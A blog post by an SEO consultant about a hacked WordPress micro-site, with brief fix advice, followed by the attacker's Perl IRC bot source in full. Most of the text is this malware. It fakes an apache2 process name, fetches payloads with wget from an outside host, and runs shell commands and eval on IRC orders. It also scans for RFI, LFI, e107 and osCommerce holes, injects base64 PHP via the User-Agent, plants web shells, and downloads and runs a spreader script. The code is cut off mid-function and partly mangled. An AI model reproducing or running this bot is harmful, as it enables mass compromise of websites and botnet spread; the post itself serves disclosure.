Mark Rushworth - Mark Rushworth - SEO Leeds & ManchesterMark Rushworth

One of our micro-sites has been hacked by a hacker called Rose who left a rather unpleasant message for all of the world to see.
If your website has been affected by this rogue trickster (i use the term lightly) then all you need to do to fix his hack is to replace your default index.php file with the original which can be downloaded direct from wordpress.org
In addition you might want to install the Sentinel plugin which will notify you if any of your core wordpress install files have been changed and allow you to quickly ftp into your webspace and overwrite the affected files.
For what its worth, Rose appears to host an IRC bot off the back of hacked sites. the code for this is below:
#!/usr/bin/perl ################################################ use HTTP::Request; # use HTTP::Request::Common; # use HTTP::Request::Common qw(POST); # use LWP::Simple; # use LWP 5.64; # use LWP::UserAgent; # use Socket; # use IO::Socket; # use IO::Socket::INET; # use IO::Select; # use MIME::Base64; # ################################################

#usage perl file.txt irc.ps-x.net
my $datetime = localtime;

my $fakeproc = "/usr/sbin/apache2 -k start";

my $ircserver = "irc.manual.keren.la";

my $ircport = "6667";

my $nickname = "TAHEDE";

my $ident = "Rose";

my $channel = "#HackeD";

my $admin = "Rose";

my $fullname = "@Rose";
my $nob0dy = "0,1(4@0nobody)";

my $lfilogo = "0,1(4@0LFI)";

my $rfilogo = "0,1(4@0RFI)";

my $e107logo = "0,1(4@0e107)";

my $xmllogo = "0,1(4@0XML)";

my $sqllogo = "0,1(4@0SQL)";

my $oscologo = "0,1(4@0OSCO)";

my $ossqllogo = "0,1(4@0OSCO-SQL)";

my $e107logosql = "0,1(4@0E107-SQL)";
my $lficmd = '!lfi';

my $rficmd = '!rfi';

my $e107cmd = '!e107';

my $xmlcmd = '!xml';

my $oscocmd = '.osco';

my $ossqlcmd = '!aosco';

my $esqlcmd = '!asq';

my $sqlcmd = '!sql';

my $cmdlfi = '!cmdlfi';

my $cmde107 = '!cmde107';

my $cmdxml = '!cmdxml';
my $injector = "http://geoffsupport.com/wp/cz/yahoo.jpg";

my $botshell = "http://geoffsupport.com/wp/cz/copy.jpg";

my $botshell2 = "http://geoffsupport.com/wp/cz/paste.jpg";

my $planetwork = "http://geoffsupport.com/wp/cz/sh";

my $ikhy = "http://geoffsupport.com/wp/cz/dor.txt";
my @uagents = ("Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",

"FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)",

"Gigabot/3.0 (http://www.gigablast.com/spider.html)",

"gsa-crawler (Enterprise; GID-01422; jplastiras@google.com)",

"Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12",

"IlTrovatore-Setaccio/1.2 (http://www.iltrovatore.it/aiuto/faq.html)",

"Mozilla/5.0 (Windows;U;Windows NT 5.1; l-PL;rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4",

"Infoseek SideWinder/2.0B (Linux 2.4 i686)",

"Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6",

"Mozilla/5.0 (compatible;Baiduspider/2.0;+http://www.baidu.com/search/spider.html)",

"Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1",

"Mozilla/5.0 (compatible;bingbot/2.0;+http://www.bing.com/bingbot.htm)",

"Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)");

my $uagent = $uagents[rand(scalar(@uagents))];

my $lfdtest = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00";

my $adm_output = ("uid=");

my $open_output = ("FCKeditor - Connectors Tests");
my @tabele = ('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',

'name','names','nombre','nombres','usuarios','member','members','admin_table','miembro','miembros','membername','admins','administrator',

'administrators','passwd','password','passwords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','user_name','user_names',

'member_password','mods','mod','moderators','moderator','user_email','user_emails','user_mail','user_mails','mail','emails','email','address',

'e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',

'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',

'sistema_usuario','sistema_password','contrasena','auth','key','senha','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',

'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors','accounts','account','accnts',

'associated','accnt','customers','customer','membres','administrateur','utilisateur','tuser','tusers','utilisateurs','password','amministratore','god','God','authors',

'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');

my @kolumny = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',

'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',

'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',

'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',

'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',

'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');

$SIG{'INT'} = 'IGNORE';

$SIG{'HUP'} = 'IGNORE';

$SIG{'TERM'} = 'IGNORE';

$SIG{'CHLD'} = 'IGNORE';

$SIG{'PS'} = 'IGNORE';

chdir("/tmp");

chop (my $priper = `wget http://geoffsupport.com/wp/cz/yahoo.jpg -O yahoo.jpg;wget http://geoffsupport.com/wp/cz/google.jpg -O google.jpg;wget http://geoffsupport.com/wp/cz/copy.jpg -O copy.jpg;wget http://geoffsupport.com/wp/cz/paste.jpg -O paste.jpg`);

$ircserver = "$ARGV[0]" if $ARGV[0];

$0 = "$fakeproc"."\0" x 16;;

my $pid = fork;

exit if $pid;

die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);
our %irc_servers;

our %DCC;

my $dcc_sel = new IO::Select->new();

$sel_client = IO::Select->new();

sub sendraw {

if ($#_ == '1') {

my $socket = $_[0];

print $socket "$_[1]\n";

} else {

print $IRC_cur_socket "$_[0]\n";

}

}
sub connector {

my $mynick = $_[0];

my $ircserver_con = $_[1];

my $ircport_con = $_[2];

my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);

if (defined($IRC_socket)) {

$IRC_cur_socket = $IRC_socket;

$IRC_socket->autoflush(1);

$sel_client->add($IRC_socket);

$irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";

$irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";

$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;

$irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;

nick("$mynick");

my $versi = "0,1 G4 o8 o g l4 e ";

sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$versi");

sleep (1);}}

sub parse {

my $servarg = shift;

if ($servarg =~ /^PING \:(.*)/) {

sendraw("PONG :$1");

}

elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {

if (lc($1) eq lc($mynick)) {

$mynick = $4;

$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;

}

}

elsif ($servarg =~ m/^\:(.+?)\s+433/i) {

nick("$mynick".int rand(1));

}

elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {

$mynick = $2;

$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;

$irc_servers{$IRC_cur_socket}{'nome'} = "$1";

sendraw("MODE $mynick +i");

sendraw("JOIN $channel");

sleep(2);

sendraw("PRIVMSG $admin :Hi $admin im here !!!");

}

}

my $line_temp;

while( 1 ) {

while (!(keys(%irc_servers))) { &connector("$nickname", "$ircserver", "$ircport"); }

select(undef, undef, undef, 0.01);;

delete($irc_servers{''}) if (defined($irc_servers{''}));

my @ready = $sel_client->can_read(0);

next unless(@ready);

foreach $fh (@ready) {

$IRC_cur_socket = $fh;

$mynick = $irc_servers{$IRC_cur_socket}{'nick'};

$nread = sysread($fh, $ircmsg, 4096);

if ($nread == 0) {

$sel_client->remove($fh);

$fh->close;

delete($irc_servers{$fh});

}

@lines = split (/\n/, $ircmsg);

$ircmsg =~ s/\r\n$//;
if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {

my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);

my $engine ="GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio,WebDe,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo,BLacK,oNeT,SiZuka,WaLLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR";

if ($path eq $mynick) {

if ($msg =~ /^PING (.*)/) {

sendraw("NOTICE $nick :PING $1");

}

if ($msg =~ /^VERSION/) {

sendraw("NOTICE $nick :VERSION mIRC v6.17 Khaled Mardam-Bey");

}

if ($msg =~ /^TIME/) {

sendraw("NOTICE $nick :TIME ".$datetime."");

}

if (&isAdmin($nick) && $msg eq "!die") {

&shell("$path","kill -9 $$");

}

if (&isAdmin($nick) && $msg eq "!killall") {

&shell("$path","killall -9 perl");

}

if (&isAdmin($nick) && $msg eq "!reset") {

sendraw("QUIT :Lompat...");

}

if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {

sendraw("JOIN #".$1);

}

if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {

sendraw("PART #".$1);

}

if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {

sendraw("NICK ".$1);

}

if (&isAdmin($nick) && $msg =~ /^!pid/) {

sendraw($IRC_cur_socket, "PRIVMSG $nick :Fake Process/PID : $fakeproc - $$");

}

if (&isAdmin($nick) && $msg !~ /^!/) {

&shell("$nick","$msg");

}

if (&isAdmin($nick) && $msg=~ /^$cmdlfi\s+(.*?)\s+(.*)/){

my $url = $1.$lfdtest;

my $cmd = $2;

&cmdlfi($url,$cmd,$nick);

}

if (&isAdmin($nick) && $msg=~ /^$cmdxml\s+(.*?)\s+(.*)/){

my $url = $1;

my $cmd = $2;

&cmdxml($url,$cmd,$nick);

}

if (&isAdmin($nick) && $msg=~ /^$cmde107\s+(.*?)\s+(.*)/){

my $url = $1;

my $cmd = $2;

&cmde107($url,$cmd,$nick);

}

}

else {

if (&isAdmin($nick) && $msg eq "!die") {

&shell("$path","kill -9 $$");

}

if (&isAdmin($nick) && $msg eq "!killall") {

&shell("$path","killall -9 perl");

}

if (&isAdmin($nick) && $msg eq "!reset") {

sendraw("QUIT :Lompat...");

}

if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {

sendraw("JOIN #".$1);

}

if (&isAdmin($nick) && $msg eq "!part") {

sendraw("PART $path");

}

if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {

sendraw("PART #".$1);

}

if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {

&shell("$path","$1");

}

if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {

&shell("$path","$1");

}

if (&isAdmin($nick) && $msg =~ /^!eval (.*)/) {

eval "$1";

}

##################################################################### HIT
if ($msg=~ /^$cmdlfi\s+(.+?)\s+(.*)/){

my $url = $1.$lfdtest;

my $cmd = $2;

&cmdlfi($url,$cmd,$path);

}

if ($msg=~ /^$cmdxml\s+(.+?)\s+(.*)/){

my $url = $1;

my $cmd = $2;

&cmdxml($url,$cmd,$path);

}

if ($msg=~ /^$cmde107\s+(.+?)\s+(.*)/){

my $url = $1;

my $cmd = $2;

&cmde107($url,$cmd,$path);

}

##################################################################### HELP COMMAND
if ($msg=~ /^!help/) {

my $helplogo = "0,1(4@0Help)";

&msg("$path","$helplogo ($lficmd|$rficmd|$sqlcmd|$xmlcmd|$oscocmd| [bug][dork] |($e107cmd | $oscocmd | [dork] ))");

}

if ($msg=~ /^!respon/ || $msg=~ /^!id/) {

if (&isFound($injector,"< ?php")) {

&msg("$path","0,1(4@0Injector) ScanneR up!!!");

} else {

&msg("$path","0,1(4@0Injector) ScanneR 4down!!!");

}

}

if (&isAdmin($nick) && $msg =~ /^!pid/) {

&notice("$nick","Fake Process/PID : $fakeproc - $$");

}

##################################################################### RFI SCAN
if ($msg=~ /^$rficmd\s+(.+?)\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);

}

else {

if (fork) { exit; } else {

if (&isFound($injector," my ($bug,$dork) = ($1,$2);

&msg("$path","$rfilogo Dork :4 $dork");

&msg("$path","$rfilogo Bugz :4 $bug");

&msg("$path","$rfilogo Search Engine Loading ...");

&scan_start($path,$bug,$dork,$engine,1);

} else {

&msg("$path","[ $nick ] $rfilogo 4PHP Shell Not Found!");

}

}

exit;

}

}
##################################################################### LFI SCAN
if ($msg=~ /^$lficmd\s+(.+?)\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);

}

else {

if (fork) { exit; } else {

if (&isFound($injector," my ($bug,$dork) = ($1,$2);

&msg("$path","$lfilogo Dork :4 $dork");

&msg("$path","$lfilogo Bugz :4 $bug");

&msg("$path","$lfilogo Search Engine Loading ...");

&scan_start($path,$bug,$dork,$engine,2);

} else {

&msg("$path","[ $nick ] $lfilogo 4PHP Shell Not Found!");

}

}

exit;

}

}
##################################################################### e107 SCAN
if ($msg=~ /^$e107cmd\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);

}

else {

if (fork) { exit; } else {

if (&isFound($injector," my ($bug,$dork) = ("contact.php",$1);

&msg("$path","$e107logo Dork :4 $dork");

&msg("$path","$e107logo Bugz :4 $bug");

&msg("$path","$e107logo Search Engine Loading ...");

&scan_start($path,$bug,$dork,$engine,3);

} else {

&msg("$path","[ $nick ] $e107logo 4PHP Shell Not Found!");

}

}

exit;

}

}

##################################################################### XML SCAN

if ($msg=~ /^$xmlcmd\s+(.*?)\s+(.*)/ ) {

if (my $pid = fork) {

waitpid($pid, 0);

}

else {

if (fork) { exit; } else {

if (&isFound($injector," my ($bug,$dork) = ($1,$2);

&msg("$path","$xmllogo Dork :4 $dork");

&msg("$path","$xmllogo Bugz :4 $bug");

&msg("$path","$xmllogo Search Engine Loading ...");

&scan_start($path,$bug,$dork,$engine,4);

} else {

&msg("$path","[ $nick ] $xmllogo 4PHP Shell Not Found!");

}

}

exit;

}

}
##################################################################### SQL SCAN
if ($msg=~ /^$sqlcmd\s+(.+?)\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);

}

else {

if (fork) { exit; } else {

my ($bug,$dork) = ($1,$2);

&msg("$path","$sqllogo Dork :4 $dork");

&msg("$path","$sqllogo Bugz :4 $bug");

&msg("$path","$sqllogo Search Engine Loading ...");

&scan_start($path,$bug,$dork,$engine,5);

}

exit;

}

}
##################################################################### OSCO SCAN
if ($msg=~ /^$oscocmd\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);

}

else {

if (fork) { exit; } else {

if (&isFound($injector," my ($bug,$dork) = ("admin/categories.php/login.php",$1);

&msg("$path","$oscologo Dork :4 $dork");

&msg("$path","$oscologo Search Engine Loading ...");

&scan_start($path,$bug,$dork,$engine,6);

} else {

&msg("$path","[ $nick ] $oscologo 4PHP Shell Not Found!");

}

}

exit;

}

}

##################################################################### OSCO2 SCAN
if ($msg=~ /^$oscocmd\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);

}

else {

if (fork) { exit; } else {

if (&isFound($injector," my ($bug,$dork) = ("admin/file_manager.php/login.php",$1);

&scan_start($path,$bug,$dork,$engine,12);

} else {

&msg("$path","[ $nick ] $oscologo 4PHP Shell Not Found!");

}

}

exit;

}

}
##################################################################### OSCO3 SCAN
if ($msg=~ /^$oscocmd\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);

}

else {

if (fork) { exit; } else {

if (&isFound($injector," my ($bug,$dork) = ("admin/banner_manager.php/login.php",$1);

&msg("$path","$oscologo Dork :4 $dork");

&msg("$path","$oscologo Search Engine Loading ...");

&scan_start($path,$bug,$dork,$engine,11);

} else {

&msg("$path","[ $nick ] $oscologo 4PHP Shell Not Found!");

}

}

exit;

}

}

##################################################################### E107SQL SCAN
if ($msg=~ /^$esqlcmd\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);

}

else {

if (fork) { exit; } else {

my ($bug,$dork) = ("contact.php",$1);

&msg("$path","$e107logosql Dork :4 $dork")

&msg("$path","$e107logosql Search Engine Loading ...");

&scan_start($path,$bug,$dork,$engine,13);

}

exit;

}

}

#####################################################################
}

}
for(my $c=0; $c0) {

foreach my $site (@list) {

$count++;

if ($count == $num-1) { &msg("$chan","$rfilogo(4@$engine) Scan finish"); }

my $coba = "http://".$site.$bug."test??";

my $test = "http://".$site.$bug.$injector."??";

my $dor = "http://".$site.$bug.$botshell."??";

my $dor2 = "http://".$site.$bug.$botshell2."??";

my $cek = &get_content($coba);sleep(1);

&get_content($dor);sleep(1);

&get_content($dor2);sleep(1);

if ($cek =~ /failed to open stream/i) {

if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {

&rfi_xpl($test,$chan,$site);

exit;}

}

}

}

}

}
sub rfi_xpl() {

my $url = $_[0];

my $chan = $_[1];

my $site = $_[2];

my $dor = $url.$botshell."??";

my $dor2 = $url.$botshell2."??";

my $test = $url.$injector."??";

my $vuln = $url."(plaNETWORK)";

my $check = &get_content($test);

&get_content($dor);sleep(1);

&get_content($dor2);sleep(1);

if ( $check =~ /Hacked By Rose/i ) {

my $safe ="";

my $os ="";

my $free ="";

if ($check =~ m/Software : (.*?)< \/u>< \/b>< \/a>

/) {$soft = $1;}

if ($check =~ m/SAFE MODE is (.*?)< \/b>< \/font>/) {$safe = $1;}

if ($check =~ m/OS : (.*?)

/) {$os = $1;}

if ($check =~ m/Freespace : (.*?)< \/p>< \/td>< \/tr>/) {$free = $1;}

&msg("#HacKeD","$rfilogo(4@VuLn) ".$vuln."(4@15SafeMode= $safe)(4@15OS= $os)(4@15FreeSpace= $free)(4@safemode-off)");

&msg("Rose","$rfilogo(4@VuLn) ".$vuln."(4@15SafeMode= $safe)(4@15OS= $os)(4@15FreeSpace= $free)");

}

else {&msg("$chan","$rfilogo(4@VuLn) ".$vuln." (4@7safemode-on)");}

}
sub lfi() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;

my @list = &search_engine($chan,$bug,$dork,$engine,$lfilogo);

my $num = scalar(@list);

if ($num > 0) {

foreach my $site (@list) {

$count++;

if ($count == $num-1) { &msg("$chan","$lfilogo(4@$engine) Scan finish"); }

my $dir = "../../../../../../../../../../../../../";

my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";

my $vuln = "http://".$site."".$bug.$dir."/proc/self/environ%0000";

my $shell = "http://".$site."".$bug.$dir."/tmp/pnt%0000";

my $html = &get_content($test);

if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT/) {

if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {

my $code = 'echo "c0li#".php_uname()."#c0li".get_current_user();if(@copy("'.$planetwork.'","/tmp/pnt")) { echo "SUCCESS";@copy("'.$botshell.'","/tmp/dev");@copy("'.$botshell2.'","/tmp/kodo"); }';

my $res = lfi_env_query($test,encode_base64($code));

&lfi_spread_query($test);

&get_content("http://".$site.$bug.$dir."/tmp/dev%0000");

&get_content("http://".$site.$bug.$dir."/tmp/kodo%0000");

$res =~ s/\n//g;

if ($res =~ /c0li#(.*)#c0li(.*)SUCCESS/sg) {

my $sys = $1;

$nob0dy = $2;

&msg("#HacKeD","$lfilogo0,1(4@0SHeLL) ".$shell." 0,1(4@0".$sys."))0,1(4@0$nob0dy)");sleep(2);

&msg("Rose","$lfilogo0,1(4@0SHeLL) ".$shell." 0,1(4@0".$sys."))0,1(4@0$nob0dy)");sleep(2);

}

elsif ($res =~ /c0li#(.*)#c0li(.*)/sg) {

if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {

my $sys = $1;

$nob0dy = $2;

my $upload = 'system("killall -9 perl;wget $injector -O version.php");';

my $wget = lfi_env_query($test,encode_base64($upload)); sleep(2);

my $check = &get_content("http://".$site.$bug.$dir."/tmp/pnt%0000"); sleep(2);

&get_content("http://".$site.$bug.$dir."/tmp/dev%0000");sleep(2);

&get_content("http://".$site.$bug.$dir."/tmp/kodo%0000");sleep(2);

if ($check =~ /Hacked By Rose/) {

&msg("#HacKeD","$lfilogo0,1(4@0SHeLL) ".$shell." 15(4@".$sys.")0,1(4@0$nob0dy)");sleep(2);

&msg("Rose","$lfilogo0,1(4@0SHeLL) ".$shell." 15(4@".$sys.")0,1(4@0$nob0dy)");sleep(2);

}

else {

&msg("$chan","$lfilogo0,1(4@0SysTem)7 ".$vuln." 15(4@".$sys."))0,1(4@0$nob0dy)");sleep(2);

}

} exit; }

}

else { &msg("$chan","$lfilogo0,1(4@0EnviRon) ".$vuln); }

} exit; } sleep(2);

}

}

}

}
sub lfi_env_query() {

my $url = $_[0];

my $code = $_[1];

my $ua = LWP::UserAgent->new(agent => "< ?eval(base64_decode('".$code."'));?>");

$ua->timeout(7);

my $req = HTTP::Request->new(GET => $url);

my $res = $ua->request($req);

return $res->content;

}
sub lfi_spread_query() {

my $url = $_[0];

my $code = "system('rm -rf /tmp/dor*;cd /tmp;wget $ikhy -O /tmp/dor.txt;perl /tmp/dor.txt;fetch $ikhy -O /tmp/dor.txt;perl dor.txt;lwp-download $ikhy;perl dor.txt');";

my $ua = LWP::UserAgent->new(agent => "< ?eval(base64_decode('".encode_base64($code)."'));?>");

$ua->timeout(7);

my $req = HTTP::Request->new(GET => $url);

my $res = $ua->request($req);

}
sub e107() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;

my @list = &search_engine($chan,$bug,$dork,$engine,$e107logo);

my $num = scalar(@list);

if ($num > 0) {

foreach my $site (@list) {

$count++;

if ($count == $num-1) { &msg("$chan","$e107logo Scan finish"); }

my $test = "http://".$site.$bug;

my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ==";

my $html = &e107_rce_query($test,$code);

if ($html =~ /v0pCr3w

sys:(.+?)

nob0dyCr3w/) {

&e107xpl1($chan,$site,$engine);

if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {

my $sys = $1;

my $upload = 'if(@copy("'.$injector.'","e107.php")) { echo "c0liSUKSESc0li";@copy("'.$botshell.'","copy.php");@copy("'.$botshell2.'","paste.php");} elseif(@copy("'.$injector.'","e107_themes/e107.php")) { echo "ikhy_dthem";@copy("'.$botshell.'","e107_themes/copy.php");@copy("'.$botshell2.'","e107_themes/paste.php");} elseif(@copy("'.$injector.'","e107_plugins/e107.php")) { echo "ikhy_dplug";@copy("'.$botshell.'","e107_plugins/copy.php");@copy("'.$botshell2.'","e107_plugins/paste.php");} elseif(@copy("'.$injector.'","e107_images/e107.php")) { echo "ikhy_dima";@copy("'.$botshell.'","e107_images/copy.php");@copy("'.$botshell2.'","e107_images/paste.php");}';

my $res = &e107_rce_query($test,encode_base64($upload));

if ($res =~ /c0liSUKSESc0li/) {

&get_content("http://".$site."copy.php");

&get_content("http://".$site."paste.php");

&msg("#HacKeD","$e107logo0,1(4@0SheLL) http://".$site."4e107.php 15(4@".$sys.")(4@safemode-off)");sleep(2);

&msg("Rose","$e107logo0,1(4@0SheLL) http://".$site."4e107.php 15(4@".$sys.")(4@safemode-off)");sleep(2);

}

elsif ($res =~ /ikhy_dthem/) {

&get_content("http://".$site."e107_themes/copy.php");

&get_content("http://".$site."e107_themes/paste.php");

&msg("#HacKeD","$e107logo0,1(4@0SheLL) http://".$site."e107_themes/4e107.php 15(4@".$sys.")(4@safemode-off)");sleep(2);

&msg("Rose","$e107logo0,1(4@0SheLL) http://".$site."e107_themes/4e107.php 15(4@".$sys.")(4@safemode-off)");sleep(2);

}

elsif ($res =~ /ikhy_dplug/) {

&get_content("http://".$site."e107_plugins/copy.php");

&get_content("http://".$site."e107_plugins/paste.php");

&msg("#HacKeD","$e107logo0,1(4@0SheLL) http://".$site."e107_plugins/4e107.php 15(4@".$sys.")(4@safemode-off)");sleep(2);

&msg("Rose","$e107logo0,1(4@0SheLL) http://".$site."e107_plugins/4e107.php 15(4@".$sys.")(4@safemode-off)");sleep(2);

}

elsif ($res =~ /ikhy_dima/) {

&get_content("http://".$site."e107_images/copy.php");

&get_content("http://".$site."e107_images/paste.php");

&msg("#HacKeD","$e107logo0,1(4@0SheLL) http://".$site."e107_images/4e107.php 15(4@".$sys.")(4@safemode-off)");sleep(2);

&msg("Rose","$e107logo0,1(4@0SheLL) http://".$site."e107_images/4e107.php 15(4@".$sys.")(4@safemode-off)");sleep(2);

}

else {

&msg("$chan","$e107logo0,1(4@0Vuln)7 ".$test." 15(4@".$sys.")(4@safemode-off)");sleep(2);

}

&e107_spread_query($test);

sleep(2);

} exit; } sleep(2);

}

elsif ($html =~ /v0pCr3w

sys:(.+?)

/) {

if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {

my $sys = $1;

my $upload = 'if(@copy("'.$injector.'","e107.php")) { echo "c0liSUKSESc0li";@copy("'.$botshell.'","copy.php");@copy("'.$botshell2.'","paste.php");} elseif(@copy("'.$injector.'","e107_themes/e107.php")) { echo "ikhy_dthem";@copy("'.$botshell.'","e107_themes/copy.php");@copy("'.$botshell2.'","e107_themes/paste.php");} elseif(@copy("'.$injector.'","e107_plugins/e107.php")) { echo "ikhy_dplug";@copy("'.$botshell.'","e107_plugins/copy.php");@copy("'.$botshell2.'","e107_plugins/paste.php");} elseif(@copy("'.$injector.'","e107_images/e107.php")) { echo "ikhy_dima";@copy("'.$botshell.'","e107_images/copy.php");@copy("'.$botshell2.'","e107_images/paste.php");}';

my $res = &e107_rce_query($test,encode_base64($upload));

if ($res =~ /c0liSUKSESc0li/) {

&e107xpl1($chan,$site,$engine);

&get_content("http://".$site."copy.php");

&get_content("http://".$site."paste.php");

&msg("#HacKeD","$e107logo0,1(4@0SheLL) http://".$site."4e107.php 15(4@".$sys.")(4@7safemode-on)");sleep(2);

&msg("Rose","$e107logo0,1(4@0SheLL) http://".$site."e107_themes/4e107.php 15(4@".$sys.")(4@safemode-off)");sleep(2);

}

if ($res =~ /ikhy_dthem/) {

&get_content("http://".$site."e107_themes/copy.php");

&get_content("http://".$site."e107_themes/paste.php");

&msg("#HacKeD","$e107logo0,1(4@0SheLL) http://".$site."e107_themes/4e107.php 15(4@".$sys.")(4@7safemode-on)");sleep(2);

&msg("Rose","$e107logo0,1(4@0SheLL) http://".$site."e107_themes/4e107.php 15(4@".$sys.")(4@safemode-off)");sleep(2);

}

if ($res =~ /ikhy_dplug/) {

&get_content("http://".$site."e107_plugins/copy.php");

&get_content("http://".$site."e107_plugins/paste.php");

&msg("#HacKeD","$e107logo0,1(4@0SheLL) http://".$site."e107_plugins/4e107.php 15(4@".$sys.")(4@7safemode-on)");sleep(2);

&msg("Rose","$e107logo0,1(4@0SheLL) http://".$site."e107_themes/4e107.php 15(4@".$sys.")(4@safemode-off)");sleep(2);

}

if ($res =~ /ikhy_dima/) {

&get_content("http://".$site."e107_images/copy.php");

&get_content("http://".$site."e107_images/paste.php");

&msg("#HacKeD","$e107logo0,1(4@0SheLL) http://".$site."e107_images/4e107.php 15(4@".$sys.")(4@7safemode-on)");sleep(2);

&msg("Rose","$e107logo0,1(4@0SheLL) http://".$site."e107_themes/4e107.php 15(4@".$sys.")(4@safemode-off)");sleep(2);

}

else {

